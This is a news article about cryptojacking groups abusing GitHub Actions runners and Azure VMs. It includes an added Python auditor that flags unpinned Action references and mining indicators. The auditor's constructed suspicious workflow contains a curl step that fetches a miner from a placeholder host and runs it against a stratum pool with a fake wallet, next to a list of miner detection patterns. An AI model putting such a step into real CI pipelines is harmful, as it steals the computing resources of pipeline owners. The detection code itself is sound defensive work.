Cybercriminals continue to target cloud services for illicit purposes, as shown by the abuse of GitHub Actions and Azure virtual machines (VMs) for cloud-based cryptocurrency mining.
“Attackers can abuse the runners or servers provided by GitHub to run an organization’s pipelines and automation by maliciously downloading and installing their own cryptocurrency miners to gain profit easily,” said Trend Micro researcher Magno Logan.
GitHub Actions (GHAs), GitHub's continuous integration and continuous delivery (CI/CD) platform, lets users automate the pipeline for building, testing, and deploying software. Developers can use it to build workflows that test each pull request before it is merged into a repository, or that publish merged pull requests to production. GitHub-hosted Linux and Windows runners run on Standard_DS2_v2 virtual machines in Azure, each with two vCPUs and 7 GB of RAM.
The Japanese company said it found over 1,000 repositories and more than 550 code samples abusing GitHub Actions to mine cryptocurrency on GitHub-provided runners, and that GitHub has been notified of the issue. In addition, 11 repositories were found to hold near-identical variants of a YAML script containing commands to mine Monero, all paying out to the same wallet, which suggests that a single actor or a group working together is responsible.
“For as long as the malicious actors only use their own accounts and repositories, end users should have no cause for worry,” said Logan. “Problems arise when these GHAs are shared on GitHub Marketplace or used as a dependency for other Actions.”
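A check a practitioner would want after the warning above about Actions pulled in from the Marketplace or used as dependencies, written here as an added example (not code from Trend Micro, GitHub, or the article): a small Python audit that flags `uses:` references not pinned to an immutable commit SHA or image digest, and flags step commands that carry cryptomining indicators (a stratum pool URL, the xmrig binary, an explicit Monero coin flag, the shape of a Monero address). The indicator list, the two sample workflows, the `example.invalid` domain, the wallet placeholder, and the commit SHA placeholder are all constructed for the example.

```python
"""Audit GitHub Actions workflow text for two risks: third-party Actions
referenced by a mutable tag or branch (a malicious update to that ref runs
inside your pipeline) and step commands that look like cryptomining.
Added example; not code from Trend Micro or GitHub. Indicators and samples
are constructed."""
import re

# A pinned action reference is owner/repo[/path]@<40-hex commit SHA>.
SHA_RE = re.compile(r"^[0-9a-f]{40}$")
# Captures the value of any `uses:` key (steps, reusable workflows, composite actions).
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^'\"\s#]+)", re.M)

# Constructed indicator list: pool protocol, the most common miner binary,
# an explicit Monero coin flag, and the shape of a Monero address
# (95 base58 characters beginning with 4 or 8).
MINER_INDICATORS = [
    re.compile(r"stratum\+(?:tcp|ssl)://", re.I),
    re.compile(r"\bxmrig\b", re.I),
    re.compile(r"--coin[=\s]+monero\b", re.I),
    re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b"),
]


def find_unpinned_actions(workflow_text: str) -> list[str]:
    """Return every `uses:` reference not pinned to a commit SHA or image digest."""
    unpinned = []
    for ref in USES_RE.findall(workflow_text):
        if ref.startswith("./"):  # local action in this repo, reviewed with the code
            continue
        if ref.startswith("docker://"):  # container action: only a digest is immutable
            if "@sha256:" not in ref:
                unpinned.append(ref)
            continue
        _, sep, version = ref.partition("@")
        if not sep or not SHA_RE.match(version):  # no ref, or a tag/branch
            unpinned.append(ref)
    return unpinned


def find_miner_indicators(workflow_text: str) -> list[str]:
    """Return distinct substrings matching a mining indicator, in indicator order."""
    hits = []
    for pattern in MINER_INDICATORS:
        for match in pattern.finditer(workflow_text):
            if match.group(0) not in hits:
                hits.append(match.group(0))
    return hits


def audit_workflow(workflow_text: str) -> dict:
    """Combine both checks into one verdict: suspicious > unpinned > ok."""
    unpinned = find_unpinned_actions(workflow_text)
    indicators = find_miner_indicators(workflow_text)
    if indicators:
        verdict = "suspicious"
    elif unpinned:
        verdict = "unpinned"
    else:
        verdict = "ok"
    return {"unpinned_actions": unpinned, "miner_indicators": indicators, "verdict": verdict}


# Constructed placeholders: not a real commit and not a real wallet.
PLACEHOLDER_SHA = "0123456789abcdef0123456789abcdef01234567"
FAKE_WALLET = "4" + "A" * 94

# Constructed workflow: a pull-request test job with the action pinned to a SHA.
BENIGN_WORKFLOW = f"""\
name: ci
on: [pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@{PLACEHOLDER_SHA}  # pin to a reviewed commit
      - run: make test
"""

# Constructed workflow: mutable refs plus a step that fetches and runs a miner.
SUSPICIOUS_WORKFLOW = f"""\
name: build
on:
  push:
    branches: [main]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - uses: someone/helper-action@main
      - uses: docker://alpine:3.18
      - name: build
        run: |
          curl -sL https://example.invalid/xmrig.tar.gz | tar xz
          ./xmrig -o stratum+tcp://pool.example.invalid:3333 -u {FAKE_WALLET}
"""

if __name__ == "__main__":
    for name, text in (("benign", BENIGN_WORKFLOW), ("suspicious", SUSPICIOUS_WORKFLOW)):
        print(name, audit_workflow(text))
```

Run it over every file under `.github/workflows/` as a pre-merge check; an Action pinned to a SHA still needs the SHA reviewed once, but a later malicious release of the same tag cannot reach the runner.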
Cryptojacking groups typically breach cloud deployments by taking advantage of a security weakness in the target, such as an unpatched vulnerability, weak credentials, or a misconfigured cloud environment. Well-known players in illicit cryptocurrency mining include 8220, Keksec (also known as Kek Security), Kinsing, Outlaw, and TeamTNT.
To make the most of the compromised cloud systems, these groups' malware toolkits also typically include kill scripts that terminate and remove rival cryptocurrency miners, in what Trend Micro describes as a fight "for control of the victim's resources." Beyond higher infrastructure and energy costs, a deployed crypto miner is also a sign of poor security hygiene: the initial access obtained through a cloud misconfiguration can just as easily be weaponized for far more harmful purposes such as data exfiltration or ransomware.
A distinctive feature of these groups, the company notes, is that in addition to contending with a target organization's security systems and personnel, they also have to fight one another for scarce resources. That struggle to seize and keep control of a victim's servers drives the evolution of their tools and tactics, pushing them to continuously improve their ability to remove rivals from compromised systems while resisting their own removal.